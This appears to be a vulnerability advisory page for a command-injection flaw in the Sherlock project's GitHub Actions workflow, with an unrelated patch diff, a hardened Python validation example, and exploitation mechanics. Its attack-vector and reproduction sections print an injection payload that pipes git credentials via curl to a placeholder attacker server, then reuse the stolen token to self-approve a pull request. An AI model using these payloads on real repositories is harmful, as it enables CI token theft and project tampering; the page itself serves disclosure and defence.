Critical severity 9.3 · NVD Advisory · Published May 27, 2026

CVE-2026-44590

Description

Sherlock hunts down social media accounts by username across social networks. Prior to 0.16.1, the GitHub Actions workflow validate_modified_targets.yml is vulnerable to command injection via the pull_request_target trigger. Any GitHub user can execute arbitrary commands on the CI runner and exfiltrate the GITHUB_TOKEN by opening a pull request. No approval, review, or merge is required. This vulnerability is fixed in 0.16.1.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Any GitHub user, without approval, review, or merge of their PR, can execute arbitrary commands on the CI runner and steal the GITHUB_TOKEN by opening a PR against the Sherlock repository (fixed in 0.16.1).

Vulnerability

In Sherlock versions prior to 0.16.1, the GitHub Actions workflow validate_modified_targets.yml is vulnerable to command injection via the pull_request_target trigger [1]. The workflow fetches data.json from the pull request and uses Python to extract JSON key names, which are then stored as a workflow output (changed_targets) and interpolated directly into a shell command via ${{ }} syntax at line 97 [1]. Because ${{ }} is evaluated before shell execution, any shell metacharacters in the JSON key names are interpreted as shell commands [1]. Affected versions: all versions before 0.16.1 [1].

Exploitation

An attacker can trigger the vulnerability by opening a pull request against the repository — no approval, review, or merge is required [1]. The attacker controls the contents of data.json, which is processed by the workflow and whose JSON key names are injected into a poetry run pytest command [1]. By including shell command sequences in those key names, the attacker achieves arbitrary command execution on the GitHub Actions runner [1]. The attacker can then extract the GITHUB_TOKEN because it is stored by actions/checkout in the git credential helper; a command such as git config --list exposes it as an HTTP authorization header [1].

Impact

Successful exploitation gives the attacker arbitrary command execution on the CI runner and allows exfiltration of the GITHUB_TOKEN [1]. The token has write permissions to issues and pull requests (pull-requests: write) and read access to contents (contents: read) [1]. This could allow the attacker to write comments, close or modify pull requests, and potentially access other repository resources that the token can read [1].

Mitigation

The vulnerability is fixed in Sherlock version 0.16.1 [1]. Users should upgrade to the latest version immediately. No workaround is available [1]. The workflow no longer uses pull_request_target in a way that allows key name injection [1].

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 1

574aeb4ac527

Merge pull request #2824 from vatsalgargg/fix-linkedin-waf

https://github.com/sherlock-project/sherlock · Paul Pfeister · Mar 17, 2026 · via body-scan-shorthand
1 file changed · +6 −1
  • sherlock_project/resources/data.json (+6 −1, modified)
    @@ -1471,8 +1471,13 @@
         "urlMain": "https://lichess.org",
         "username_claimed": "john"
       },
    -  "LinkedIn": {
    + "LinkedIn": {
         "errorType": "status_code",
    +    "headers": {
    +      "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    +      "Accept-Language": "en-US,en;q=0.9",
    +      "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
    +    },
         "regexCheck": "^[a-zA-Z0-9]{3,100}$",
         "request_method": "GET",
         "url": "https://linkedin.com/in/{}",
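Review bot: the only change to the `"LinkedIn": {` line is its indentation dropping from two spaces to one (`-  "LinkedIn": {` / `+ "LinkedIn": {`), which leaves this key out of step with every neighbouring entry (`},` and the next key sit at two spaces) and adds noise to the diff; restore the two-space indent so the hunk is purely the added `headers` object. Note also that this diff only adds browser-like `User-Agent`, `Accept-Language` and `Accept` headers to the LinkedIn target in `data.json`; it does not touch `.github/workflows/validate_modified_targets.yml`, so it is not the fix for the `pull_request_target` injection this advisory tracks.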
    

Vulnerability mechanics

Root cause

"Direct interpolation of attacker-controlled JSON key names into a shell command via `${{ }}` syntax in a GitHub Actions workflow triggered by `pull_request_target` allows command injection."

Attack vector

Any GitHub user can fork the repository, add a crafted JSON key containing shell metacharacters (e.g., `TestSite\"; git config --list | curl -X POST -d @- https://<ATTACKER_SERVER>/exfil; sleep 180; echo \"`) to `sherlock_project/resources/data.json`, and open a pull request against the upstream repository [ref_id=1]. The `pull_request_target` trigger causes the workflow to run automatically in the context of the base repository with access to secrets, and GitHub Actions resolves `${{ }}` before the shell executes, so the injected metacharacters are interpreted as shell syntax [ref_id=1]. The attacker achieves arbitrary command execution on the CI runner and can exfiltrate the `GITHUB_TOKEN` from the git credential helper (stored by `actions/checkout`) via `git config --list` [ref_id=1]. No approval, review, or merge is required [ref_id=1].

Affected code

The vulnerable workflow is `.github/workflows/validate_modified_targets.yml`. It uses `pull_request_target` (line 5) and interpolates attacker-controlled JSON key names directly into a shell command via `${{ }}` syntax at line 97: `poetry run pytest -q --tb no -rA -m validate_targets -n 20 --chunked-sites "${{ steps.discover-modified.outputs.changed_targets }}"` [ref_id=1]. The Python script on lines 59-78 extracts JSON key names from the PR's `data.json` file and stores them as a workflow output called `changed_targets` [ref_id=1].

What the fix does

The advisory recommends replacing `${{ }}` interpolation with a shell environment variable and disabling credential persistence: set `persist-credentials: false` on `actions/checkout@v5` and pass the output via `env.CHANGED_TARGETS` instead of inline `${{ }}` syntax [ref_id=1]. This prevents shell metacharacters in JSON key names from being interpreted as shell commands and prevents the `GITHUB_TOKEN` from being stored in the git credential helper where it could be exfiltrated [ref_id=1]. The patch referenced in the advisory ([patch_id=2749098]) addresses an unrelated LinkedIn WAF bypass and does not contain the workflow fix.
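A hardened version of the key-discovery step described under Affected code, written for this page as an added example (not the project's workflow script): it mirrors the discovery step, rejects any target name that is not plain data, writes the output in heredoc form so the job can pass it through `env` as the fix recommends, and builds the pytest invocation as an argv list rather than a shell string. The allowlist pattern, the sample data.json snapshots and the comma-joined `--chunked-sites` value are assumptions.

```python
import json
import re
import secrets

# Allowlist for target names in data.json: an assumed policy for this example,
# not something the advisory or the project defines.
SAFE_KEY = re.compile(r"[A-Za-z0-9][A-Za-z0-9 ._+-]{0,99}")

# Constructed before/after snapshots of data.json (not the real file); the third key
# in HEAD_JSON is a shortened form of the crafted key quoted in the advisory.
BASE_JSON = ('{"Lichess": {"url": "https://lichess.org/@/{}"},'
             ' "LinkedIn": {"url": "https://linkedin.com/in/{}"}}')
HEAD_JSON = ('{"Lichess": {"url": "https://lichess.org/@/{}"},'
             ' "LinkedIn": {"url": "https://linkedin.com/in/{}", "headers": {"Accept-Language": "en-US"}},'
             ' "TestSite\\"; git config --list; echo \\"": {"url": "https://example.com/{}"}}')

def changed_keys(base_json: str, head_json: str) -> list[str]:
    """Names of targets the PR adds or modifies (what the workflow's discovery step computes)."""
    base, head = json.loads(base_json), json.loads(head_json)
    return sorted(k for k, v in head.items() if base.get(k) != v)

def is_safe_key(key: str) -> bool:
    """True only when the name is plain data; quotes, semicolons, pipes and newlines all fail."""
    return SAFE_KEY.fullmatch(key) is not None

def validate_keys(keys: list[str]) -> list[str]:
    """Fail the job before any shell sees the names, instead of relying on quoting later."""
    bad = [k for k in keys if not is_safe_key(k)]
    if bad:
        raise ValueError(f"unsafe target name(s) in data.json: {bad!r}")
    return keys

def github_output(name: str, value: str) -> str:
    """Heredoc form of a $GITHUB_OUTPUT record; the random delimiter stops a value from
    defining extra outputs. The job then reads it via env:, never via ${{ }} inside run:."""
    delim = "EOF_" + secrets.token_hex(8)
    return f"{name}<<{delim}\n{value}\n{delim}\n"

def pytest_argv(keys: list[str]) -> list[str]:
    """argv for the validation run, executed without a shell so the names stay one argument.
    Comma-joining is an assumption about --chunked-sites, not taken from the advisory."""
    return ["poetry", "run", "pytest", "-q", "--tb", "no", "-rA", "-m", "validate_targets",
            "-n", "20", "--chunked-sites", ",".join(keys)]

if __name__ == "__main__":
    found = changed_keys(BASE_JSON, HEAD_JSON)
    print("changed:", found, "rejected:", [k for k in found if not is_safe_key(k)])
    accepted = validate_keys([k for k in found if is_safe_key(k)])
    print(github_output("changed_targets", ",".join(accepted)), end="")
    print(pytest_argv(accepted))
```

Running the script on the constructed snapshots rejects the crafted key and emits only `LinkedIn` as the `changed_targets` output.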

Preconditions

  • auth: Attacker must have a GitHub account (any user can fork and open a PR)
  • config: The repository must have the vulnerable workflow enabled (default for public repos)
  • input: Attacker must craft a JSON key with shell metacharacters in data.json
  • network: Workflow triggers automatically on PR creation (no user interaction needed)

Reproduction

1. Fork the repository and enable workflows in the fork's Actions tab.
2. Create a branch `malicious-pr` and add a crafted JSON key to `sherlock_project/resources/data.json` containing a shell injection payload, e.g.: `"TestSite\"; git config --list | curl -X POST -d @- https://<ATTACKER_SERVER>/exfil; sleep 180; echo \"": { "errorType": "status_code", "url": "https://example.com/{}", "urlMain": "https://example.com/", "username_claimed": "test" }`.
3. Commit and push the branch, then open a pull request against the upstream repository's `master` branch.
4. The workflow triggers automatically; the attacker's server receives an HTTP POST containing the base64-encoded `GITHUB_TOKEN` from the git credential helper.
5. Decode the token and use it to approve the attacker's own PR via the GitHub API: `curl -X POST -H "Authorization: token <GITHUB_TOKEN>" -H "Accept: application/vnd.github+json" https://api.github.com/repos/<OWNER>/sherlock/pulls/<PR_NUMBER>/reviews -d '{"event":"APPROVE","body":"All checks passed. LGTM!"}'` [ref_id=1].

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 1
